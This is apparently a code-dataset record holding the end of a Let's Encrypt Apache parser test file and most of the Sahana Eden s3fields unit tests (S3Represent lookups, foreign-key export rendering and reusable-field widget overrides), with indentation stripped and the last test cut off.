flags=augeas.Augeas.NONE | augeas.Augeas.NO_MODL_AUTOLOAD)
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.config_dir)
shutil.rmtree(self.work_dir)
@mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
def test_unparsable(self, mock_cfg):
from letsencrypt_apache.parser import ApacheParser
mock_cfg.return_value = ('Define: TEST')
self.assertRaises(
errors.PluginError,
ApacheParser, self.aug, os.path.relpath(self.config_path),
"/dummy/vhostpath", version=(2, 2, 22))
def test_root_normalized(self):
from letsencrypt_apache.parser import ApacheParser
with mock.patch("letsencrypt_apache.parser.ApacheParser."
"update_runtime_variables"):
path = os.path.join(
self.temp_dir,
"debian_apache_2_4/////multiple_vhosts/../multiple_vhosts/apache2")
parser = ApacheParser(self.aug, path,
"/dummy/vhostpath")
self.assertEqual(parser.root, self.config_path)
def test_root_absolute(self):
from letsencrypt_apache.parser import ApacheParser
with mock.patch("letsencrypt_apache.parser.ApacheParser."
"update_runtime_variables"):
parser = ApacheParser(
self.aug, os.path.relpath(self.config_path),
"/dummy/vhostpath")
self.assertEqual(parser.root, self.config_path)
def test_root_no_trailing_slash(self):
from letsencrypt_apache.parser import ApacheParser
with mock.patch("letsencrypt_apache.parser.ApacheParser."
"update_runtime_variables"):
parser = ApacheParser(
self.aug, self.config_path + os.path.sep,
"/dummy/vhostpath")
self.assertEqual(parser.root, self.config_path)
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
mitnk/letsencrypt
|
letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
|
Python
|
apache-2.0
| 8,205
| 0.000122
|
# -*- coding: utf-8 -*-
#
# s3fields unit tests
#
# To run this script use:
# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3/s3fields.py
#
import unittest
from gluon.languages import lazyT
from gluon.dal import Query
from s3.s3fields import *
# =============================================================================
class S3RepresentTests(unittest.TestCase):
# -------------------------------------------------------------------------
def setUp(self):
T = current.T
self.test_opts = {
1: "Test1",
2: "Test2",
3: "Test3"
}
current.auth.override = True
s3db = current.s3db
otable = s3db.org_organisation
org1 = Storage(name="Represent Test Organisation1")
org1_id = otable.insert(**org1)
org1.update(id=org1_id)
s3db.update_super(otable, org1)
org2 = Storage(name="Represent Test Organisation2")
org2_id = otable.insert(**org2)
org2.update(id=org2_id)
s3db.update_super(otable, org2)
self.id1 = org1_id
self.id2 = org2_id
self.name1 = org1.name
self.name2 = org2.name
# -------------------------------------------------------------------------
def testSetup(self):
""" Check lazy setup method """
# Check for options
r = S3Represent(options=self.test_opts)
self.assertFalse(r.setup)
r._setup()
self.assertTrue(r.setup)
self.assertEqual(r.tablename, None)
self.assertEqual(r.options, self.test_opts)
# Check for lookups
r = S3Represent(lookup="org_organisation")
self.assertFalse(r.setup)
self.assertEqual(r.options, None)
self.assertEqual(r.tablename, "org_organisation")
self.assertEqual(r.key, None)
self.assertEqual(r.fields, None)
self.assertEqual(r.labels, None)
self.assertEqual(r.table, None)
r._setup()
self.assertTrue(r.setup)
self.assertEqual(r.options, None)
self.assertEqual(r.tablename, "org_organisation")
self.assertEqual(r.key, "id")
self.assertEqual(r.fields, ["name"])
self.assertEqual(r.labels, None)
self.assertEqual(r.table, current.db.org_organisation)
# -------------------------------------------------------------------------
def testOptions(self):
""" Test option field representation """
r = S3Represent(options=self.test_opts, none="NONE")
# Standard variants
self.assertEqual(r(1), "Test1")
self.assertEqual(r.multiple([1,2,3]), "Test1, Test2, Test3")
self.assertEqual(r.bulk([1,2,3]),
{
1: "Test1",
2: "Test2",
3: "Test3",
None: "NONE",
}
)
# list:type
r = S3Represent(options=self.test_opts,
none="NONE", multiple=True)
# Should work with both, single value and list
self.assertEqual(r(1), "Test1")
self.assertEqual(r([1,2]), "Test1, Test2")
# Multiple does always expect list of lists
self.assertRaises(ValueError, r.multiple, [1,2,3])
# Check multiple with list:type
result = r.multiple([[1,2]]).split(", ")
self.assertTrue("Test1" in result)
self.assertTrue("Test2" in result)
self.assertEqual(len(result), 2)
# Check that multiple with list:type de-duplicates properly
result = r.multiple([[1,2], [2,3]]).split(", ")
self.assertTrue("Test1" in result)
self.assertTrue("Test2" in result)
self.assertTrue("Test3" in result)
self.assertEqual(len(result), 3)
# Check bulk with list:type
result = r.bulk([[1,2], [2,3]])
self.assertEqual(len(result), 4)
self.assertTrue(1 in result)
self.assertEqual(result[1], "Test1")
self.assertTrue(2 in result)
self.assertEqual(result[2], "Test2")
self.assertTrue(3 in result)
self.assertEqual(result[3], "Test3")
self.assertTrue(None in result)
self.assertEqual(result[None], "NONE")
# -------------------------------------------------------------------------
def testForeignKeys(self):
""" Test foreign key lookup representation """
r = S3Represent(lookup="org_organisation")
# Check lookup value by value
self.assertEqual(r(self.id1), self.name1)
self.assertEqual(r(self.id2), self.name2)
self.assertEqual(r.queries, 2)
# Check lookup of multiple values
self.assertEqual(r.multiple([self.id1, self.id2]),
"%s, %s" % (self.name1, self.name2))
# Should not have needed any additional queries
self.assertEqual(r.queries, 2)
# Check bulk lookup
result = r.bulk([self.id1, self.id2])
self.assertTrue(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
# Should still not have needed any additional queries
self.assertEqual(r.queries, 2)
# Check that only one query is used for multiple values
r = S3Represent(lookup="org_organisation")
result = r.bulk([self.id1, self.id2])
self.assertTrue(len(result), 3)
self.assertEqual(r.queries, 1)
# Check translation
r = S3Represent(lookup="org_organisation", translate=True)
result = r(self.id1)
self.assertTrue(isinstance(result, lazyT))
self.assertEqual(result, current.T(self.name1))
def testRowsPrecedence(self):
# Check that rows get preferred over values
r = S3Represent(lookup="org_organisation")
otable = current.s3db.org_organisation
org1 = otable[self.id1]
org2 = otable[self.id2]
# Test single value
self.assertEqual(r(None, row=org1), self.name1)
self.assertEqual(r(self.id2, row=org1), self.name1)
# Test multiple
result = r.multiple(None, rows=[org1, org2])
self.assertTrue(isinstance(result, basestring))
self.assertTrue(", " in result)
result = result.split(", ")
self.assertEqual(len(result), 2)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
result = r.multiple([self.id1], rows=[org1, org2])
self.assertTrue(isinstance(result, basestring))
self.assertTrue(", " in result)
result = result.split(", ")
self.assertEqual(len(result), 2)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
# Test bulk
result = r.bulk(None, rows=[org1, org2])
self.assertTrue(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
result = r.bulk([self.id1], rows=[org1, org2])
self.assertTrue(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
# -------------------------------------------------------------------------
def testListReference(self):
""" Test Foreign Key Representation in list:reference types """
r = S3Represent(lookup="org_organisation",
multiple=True,
#linkto=URL(c="org", f="organisation", args=["[id]"]),
show_link=True)
a = current.request.application
# Single value gives a single result
result = r(self.id1)
self.assertTrue(isinstance(result, DIV))
self.assertEqual(len(result), 1)
self.assertTrue(isinstance(result[0], A))
self.assertEqual(result[0].attributes["_href"],
"/%s/org/organisation/%s" % (a, self.id1))
self.assertEqual(result[0].components[0],
"Represent Test Organisation1")
# Test with show_link=False
result = r(self.id1, show_link=False)
self.assertEqual(result, self.name1)
# List value gives a comma-separated list
result = r([self.id1, self.id2], show_link=False).split(", ")
self.assertEqual(len(result), 2)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
values = [[self.id1, self.id2], [self.id2], [None, self.id1]]
# Multiple lists give a comma-separated list of unique values
result = r.multiple(values, show_link=False).split(", ")
self.assertEqual(len(result), 3)
self.assertTrue(self.name1 in result)
self.assertTrue(self.name2 in result)
self.assertTrue(current.messages.NONE in result)
# Bulk representation gives a dict of all unique values
result = r.bulk(values, show_link=False)
self.assertTrue(isinstance(result, dict))
self.assertEqual(len(result), 3)
self.assertEqual(result[self.id1], self.name1)
self.assertEqual(result[self.id2], self.name2)
self.assertTrue(None in result)
# Test render_list method
repr1 = r.render_list(values[0], result, show_link=False)
self.assertEqual(repr1, ", ".join([self.name1, self.name2]))
repr2 = r.render_list(values[1], result, show_link=False)
self.assertEqual(repr2, self.name2)
# Test render_list with show_link
result = r.bulk(values)
repr1 = r.render_list(values[0], result)
self.assertTrue(isinstance(repr1, DIV))
self.assertEqual(len(repr1), 3)
self.assertTrue(isinstance(repr1[0], A))
self.assertEqual(repr1[0].attributes["_href"],
"/%s/org/organisation/%s" % (a, self.id1))
self.assertEqual(repr1[0].components[0],
"Represent Test Organisation1")
self.assertEqual(repr1[1], ", ")
self.assertTrue(isinstance(repr1[2], A))
self.assertEqual(repr1[2].attributes["_href"],
"/%s/org/organisation/%s" % (a, self.id2))
self.assertEqual(repr1[2].components[0],
"Represent Test Organisation2")
# Check NONE-option
repr2 = r.render_list(values[2], result)
self.assertTrue(isinstance(repr2, DIV))
self.assertEqual(len(repr2), 3)
self.assertEqual(str(repr2[0]), str(current.messages.NONE))
# Check representation of None and empty lists
self.assertEqual(r(None, show_link=False), str(current.messages.NONE))
self.assertEqual(r([]), str(current.messages.NONE))
self.assertEqual(r.multiple([None], show_link=False), str(current.messages.NONE))
self.assertEqual(r.multiple([[]], show_link=False), str(current.messages.NONE))
# All that should have taken exactly 2 queries!
self.assertEqual(r.queries, 2)
# -------------------------------------------------------------------------
def tearDown(self):
current.db.rollback()
current.auth.override = False
# =============================================================================
class S3ExtractLazyFKRepresentationTests(unittest.TestCase):
""" Test lazy representation of foreign keys in datatables """
tablename = "export_lazy_fk_represent"
# -------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
db = current.db
db.define_table(cls.tablename,
Field("location_id",
"reference gis_location"),
Field("organisation_id",
"reference org_organisation"),
Field("facility_type_id",
"list:reference org_facility_type"),
*s3_meta_fields())
# -------------------------------------------------------------------------
def setUp(self):
tablename = self.tablename
s3db = current.s3db
table = s3db[tablename]
s3db.add_components("org_organisation",
**{tablename: {"name": "test",
"joinby": "organisation_id",
},
}
)
current.auth.override = True
# Create locations
locations = (Storage(name="FK Represent TestLocation 1"),
Storage(name="FK Represent TestLocation 2"))
ltable = s3db.gis_location
for i in xrange(len(locations)):
location = locations[i]
location_id = ltable.insert(**location)
location["id"] = location_id
self.locations = locations
# Create facility types
fac_types = (Storage(name="FK Represent TestFacType P"),
Storage(name="FK Represent TestFacType Q"),
Storage(name="FK Represent TestFacType R"))
ttable = s3db.org_facility_type
for i in xrange(len(fac_types)):
fac_type = fac_types[i]
fac_type_id = ttable.insert(**fac_type)
fac_type["id"] = fac_type_id
self.fac_types = fac_types
# Create organisation
org = Storage(name="FK Represent TestOrg A")
otable = s3db.org_organisation
org_id = otable.insert(**org)
org["id"] = org_id
s3db.update_super(otable, org)
self.org = org
# Create test records
facs = (Storage(organisation_id=org.id,
facility_type_id=[fac_types[0].id, fac_types[1].id],
location_id=locations[0].id),
Storage(organisation_id=org.id,
facility_type_id=[fac_types[1].id, fac_types[2].id],
location_id=locations[1].id))
for i in xrange(len(facs)):
fac = facs[i]
fac_id = table.insert(**fac)
fac["id"] = fac_id
self.facs = facs
# -------------------------------------------------------------------------
def testRepresentReferenceSingleNoLinkto(self):
"""
Test Representation of reference, single value,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.organisation_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_organisation")
table = resource.table
table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
self.assertEqual(output[fname], self.org.name)
# -------------------------------------------------------------------------
def testRepresentReferenceSingleLinktoOn(self):
"""
Test Representation of reference, single value,
with linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.organisation_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_organisation",
#linkto=URL(c="org", f="organisation", args=["[id]"]),
show_link=True)
table = resource.table
table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname]
self.assertTrue(isinstance(representation, A))
self.assertEqual(representation.attributes["_href"],
"/%s/org/organisation/%s" %
(current.request.application, self.org.id))
self.assertEqual(representation.components[0],
self.org.name)
# -------------------------------------------------------------------------
def testRepresentReferenceSingleLinktoOff(self):
"""
Test Representation of reference, single value,
with linkto + show_link=False
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.organisation_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_organisation",
linkto=URL(c="org", f="organisation", args=["[id]"]))
table = resource.table
table.organisation_id.represent = renderer
data = resource.select(["id", "organisation_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
self.assertEqual(output[fname], self.org.name)
# -------------------------------------------------------------------------
def testRepresentReferenceMultipleNoLinkto(self):
"""
Test Representation of reference, multiple values,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location")
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "test.location_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname].split(", ")
self.assertEqual(len(names), 2)
self.assertTrue(self.locations[0].name in names)
self.assertTrue(self.locations[1].name in names)
# -------------------------------------------------------------------------
def testRepresentReferenceMultipleLinktoOn(self):
"""
Test Representation of reference, multiple values,
with linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location",
#linkto=URL(c="gis", f="location", args=["[id]"]),
show_link=True)
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "name", "test.location_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname]
self.assertTrue(isinstance(names, DIV))
from lxml import etree
tree = etree.fromstring("<div>%s</div>" % names)
links = tree.findall("a")
self.assertEqual(len(links), 2)
appname = current.request.application
a = lambda location: (location.name,
"/%s/gis/location/%s" % (appname, location.id))
types = dict(a(location) for location in self.locations)
for link in links:
name = link.text
self.assertTrue(name in types)
self.assertEqual(link.get("href", None),
types[name])
# -------------------------------------------------------------------------
def testRepresentReferenceMultipleLinktoOff(self):
"""
Test Representation of reference, multiple values,
with linkto + show_link=False
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location",
linkto=URL(c="gis", f="location", args=["[id]"]))
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "name", "test.location_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname].split(", ")
self.assertEqual(len(names), 2)
self.assertTrue(self.locations[0].name in names)
self.assertTrue(self.locations[1].name in names)
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleNoLinkto(self):
"""
Test Representation of list:reference, single value,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_facility_type",
multiple=True)
table = resource.table
table.facility_type_id.represent = renderer
data = resource.select(["id", "facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 2)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleLinktoOn(self):
"""
Test Representation of list:reference, single value,
with linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
#linkto=URL(c="org", f="facility_type", args=["[id]"]),
show_link=True)
table = resource.table
table.facility_type_id.represent = renderer
data = resource.select(["id", "facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
names = output[fname]
self.assertTrue(isinstance(names, DIV))
from lxml import etree
tree = etree.fromstring("<div>%s</div>" % names)
links = tree.findall("a")
self.assertEqual(len(links), 2)
appname = current.request.application
a = lambda fac_type: (fac_type.name,
"/%s/org/facility_type/%s" % (appname, fac_type.id))
types = dict(a(fac_type) for fac_type in self.fac_types)
for link in links:
name = link.text
self.assertTrue(name in types)
self.assertEqual(link.get("href", None),
types[name])
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleLinktoOff(self):
"""
Test Representation of list:reference, single value,
with linkto + show_link=False
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
fac = self.facs[0]
resource = s3db.resource(tablename, id=fac.id)
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
linkto=URL(c="org", f="facility_type", args=["[id]"]))
table = resource.table
table.facility_type_id.represent = renderer
data = resource.select(["id", "facility_type_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 2)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
# -------------------------------------------------------------------------
def testRepresentListReferenceMultipleNoLinkto(self):
"""
Test Representation of list:reference, multiple values,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.location_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="gis_location",
linkto=URL(c="gis", f="location", args=["[id]"]))
ftable.location_id.represent = renderer
resource = s3db.resource("org_organisation", id=self.org.id)
data = resource.select(["id", "name", "test.location_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(len(result), 1)
output = result[0]
self.assertTrue(fname in output)
names = output[fname].split(", ")
self.assertEqual(len(names), 2)
self.assertTrue(self.locations[0].name in names)
self.assertTrue(self.locations[1].name in names)
# -------------------------------------------------------------------------
def testRepresentListReferenceSingleNoLinkto(self):
"""
Test Representation of list:reference, single value,
without linkto
"""
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="org_facility_type",
multiple=True)
ftable.facility_type_id.represent = renderer
org = self.org
resource = s3db.resource("org_organisation", id=org.id)
data = resource.select(["id", "test.facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 3)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
self.assertTrue(self.fac_types[2].name in representation)
# -------------------------------------------------------------------------
def testRepresentListReferenceMultipleLinktoOn(self):
"""
Test Representation of list:reference, multiple values,
with linkto
"""
s3db = current.s3db
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
#linkto=URL(c="org", f="facility_type", args=["[id]"]),
show_link=True)
ftable.facility_type_id.represent = renderer
org = self.org
resource = s3db.resource("org_organisation", id=org.id)
data = resource.select(["id", "test.facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
names = output[fname]
self.assertTrue(isinstance(names, DIV))
from lxml import etree
tree = etree.fromstring("<div>%s</div>" % names)
links = tree.findall("a")
self.assertEqual(len(links), 3)
appname = current.request.application
a = lambda fac_type: (fac_type.name,
"/%s/org/facility_type/%s" % (appname, fac_type.id))
types = dict(a(fac_type) for fac_type in self.fac_types)
for link in links:
name = link.text
self.assertTrue(name in types)
self.assertEqual(link.get("href", None),
types[name])
# -------------------------------------------------------------------------
def testRepresentListReferenceMultipleLinktoOff(self):
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
linkto=URL(c="org", f="facility_type", args=["[id]"]))
ftable.facility_type_id.represent = renderer
org = self.org
resource = s3db.resource("org_organisation", id=org.id)
data = resource.select(["id", "test.facility_type_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 3)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
self.assertTrue(self.fac_types[2].name in representation)
# -------------------------------------------------------------------------
def tearDown(self):
del current.model.components["org_organisation"]["test"]
current.db.rollback()
current.auth.override = False
# -------------------------------------------------------------------------
@classmethod
def tearDownClass(cls):
try:
current.db[cls.tablename].drop()
except:
pass
#=============================================================================
class S3ExportLazyFKRepresentationTests(unittest.TestCase):
""" Test lazy representations of foreign keys in exports """
# -------------------------------------------------------------------------
def setUp(self):
self.tablename = tablename = "export_lazy_fk_represent"
db = current.db
db.define_table(tablename,
Field("location_id",
"reference gis_location"),
Field("organisation_id",
"reference org_organisation"),
Field("facility_type_id",
"list:reference org_facility_type"),
*s3_meta_fields())
current.auth.override = True
s3db = current.s3db
# Create locations
locations = (Storage(name="FK Represent TestLocation 1"),
Storage(name="FK Represent TestLocation 2"))
ltable = s3db.gis_location
for i in xrange(len(locations)):
location = locations[i]
location_id = ltable.insert(**location)
location["id"] = location_id
self.locations = Storage([(l.id, l) for l in locations])
# Create facility types
fac_types = (Storage(name="FK Represent TestFacType P"),
Storage(name="FK Represent TestFacType Q"),
Storage(name="FK Represent TestFacType R"))
ttable = s3db.org_facility_type
for i in xrange(len(fac_types)):
fac_type = fac_types[i]
fac_type_id = ttable.insert(**fac_type)
fac_type["id"] = fac_type_id
self.fac_types = Storage([(t.id, t) for t in fac_types])
# Create organisation
org = Storage(name="FK Represent TestOrg B")
otable = s3db.org_organisation
org_id = otable.insert(**org)
org["id"] = org_id
s3db.update_super(otable, org)
self.org = org
# Create test records
facs = (Storage(organisation_id=org.id,
facility_type_id=[fac_types[0].id, fac_types[1].id],
location_id=locations[0].id),
Storage(organisation_id=org.id,
facility_type_id=[fac_types[1].id, fac_types[2].id],
location_id=locations[1].id))
for i in xrange(len(facs)):
fac = facs[i]
fac_id = db[tablename].insert(**fac)
fac["id"] = fac_id
self.facs = facs
# -------------------------------------------------------------------------
def testRepresentReferenceSingleNoLinkto(self):
"""
Test Representation of reference, single value,
without linkto
"""
s3db = current.s3db
resource = s3db.resource(self.tablename,
id=[fac.id for fac in self.facs])
table = resource.table
# Attach lazy renderers
org_id_renderer = S3Represent(lookup="org_organisation")
table.organisation_id.represent = org_id_renderer
fac_type_renderer = S3Represent(lookup="org_facility_type",
multiple=True)
table.facility_type_id.represent = fac_type_renderer
loc_id_renderer = S3Represent(lookup="gis_location",
linkto=URL(c="gis", f="location", args=["[id]"]))
table.location_id.represent = loc_id_renderer
# Export with IDs
current.xml.show_ids = True
tree = resource.export_tree(dereference=False)
root = tree.getroot()
locations = self.locations
fac_types = self.fac_types
org = self.org
# Check correct representation in exports
for fac in self.facs:
# Find the element
elem = root.findall("resource[@id='%s']" % fac.id)
elem = elem[0] if len(elem) else None
self.assertNotEqual(elem, None)
find = lambda name: elem.findall("reference[@field='%s']" % name)
organisation_id = find("organisation_id")
organisation_id = organisation_id[0] \
if len(organisation_id) else None
self.assertNotEqual(organisation_id, None)
self.assertEqual(organisation_id.text, org.name)
location_id = find("location_id")
location_id = location_id[0] \
if len(location_id) else None
self.assertNotEqual(location_id, None)
location = locations[fac.location_id]
self.assertEqual(location_id.text, location.name)
facility_type_id = find("facility_type_id")
facility_type_id = facility_type_id[0] \
if len(facility_type_id) else None
self.assertNotEqual(facility_type_id, None)
ftypes = ", ".join([fac_types[i].name
for i in fac.facility_type_id])
self.assertEqual(facility_type_id.text, ftypes)
# Check that only 1 query per renderer was needed for the export
self.assertEqual(org_id_renderer.queries, 1)
self.assertEqual(fac_type_renderer.queries, 1)
self.assertEqual(loc_id_renderer.queries, 1)
# -------------------------------------------------------------------------
def tearDown(self):
db = current.db
db.rollback()
current.auth.override = False
try:
db[self.tablename].drop()
except:
pass
# =============================================================================
class S3ReusableFieldTests(unittest.TestCase):
""" Test multiple named widgets in reusable fields """
# -------------------------------------------------------------------------
def widget1(self):
""" Dummy widget """
pass
def widget2(self):
""" Dummy widget """
pass
def widget3(self):
""" Dummy widget """
pass
# -------------------------------------------------------------------------
def testWidgetOverrideWithoutDefault(self):
""" Test setting the widget in the instance (no default) """
rf = S3ReusableField("test", "integer")
# Default None
field = rf()
self.assertEqual(field.widget, None)
# Widget-parameter overrides default
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# -------------------------------------------------------------------------
def testWidgetOverrideWithDefault(self):
""" Test overriding the default widget in the instance """
rf = S3ReusableField("test", "integer",
widget=self.widget1)
# Default widget
field = rf()
self.assertEqual(field.widget, self.widget1)
# Widget-parameter overrides default
field = rf(widget=self.widget2)
self.assertEqual(field.widget, self.widget2)
# -------------------------------------------------------------------------
def testSingleWidget(self):
""" Test using widget set with single widget """
rf = S3ReusableField("test", "integer",
widgets=self.widget1)
# Default
field = rf()
self.assertEqual(field.widget, self.widget1)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, self.widget1)
# Override
field = rf(widget=self.widget2)
self.assertEqual(field.widget, self.widget2)
# Undefined widget
self.assertRaises(NameError, rf, widget="alternative")
# -------------------------------------------------------------------------
def testMultipleWidgets(self):
""" Test using widget set with multiple widgets """
rf = S3ReusableField("test", "integer",
widgets={"default": self.widget1,
"alternative": self.widget2,
},
)
# Using default from set
field = rf()
self.assertEqual(field.widget, self.widget1)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, self.widget1)
# Other choice
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# Override
field = rf(widget=self.widget3)
self.assertEqual(field.widget, self.widget3)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testMultipleWidgetsWithDefault(self):
""" Test using widget set with multiple widgets and override default """
rf = S3ReusableField("test", "integer",
widgets={"default": self.widget1,
"alternative": self.widget2,
},
widget=self.widget3,
)
# "widget"-setting overrides "default"
field = rf()
self.assertEqual(field.widget, self.widget3)
# "widget"-setting overrides "default"
field = rf(widget="default")
self.assertEqual(field.widget, self.widget3)
# Other alternatives still available
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# And can still override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testFallbackWithDefault(self):
""" Test fallback to default widget """
rf = S3ReusableField("test", "integer",
widget=self.widget1,
widgets={"alternative": self.widget2},
)
# Standard fallback
field = rf()
self.assertEqual(field.widget, self.widget1)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, self.widget1)
# Alternative
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# Override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testExplicitNone(self):
""" Test explicit None-widget in instance """
rf = S3ReusableField("test", "integer",
widgets={"default": self.widget1,
"alternative": self.widget2,
},
widget=self.widget3,
)
# Standard fallback
field = rf(widget=None)
self.assertEqual(field.widget, None)
# -------------------------------------------------------------------------
def testFallbackWithoutDefault(self):
""" Test fallback to None """
rf = S3ReusableField("test", "integer",
widgets={"alternative": self.widget2},
)
# Standard fallback
field = rf()
self.assertEqual(field.widget, None)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, None)
# Alternative
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# Override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
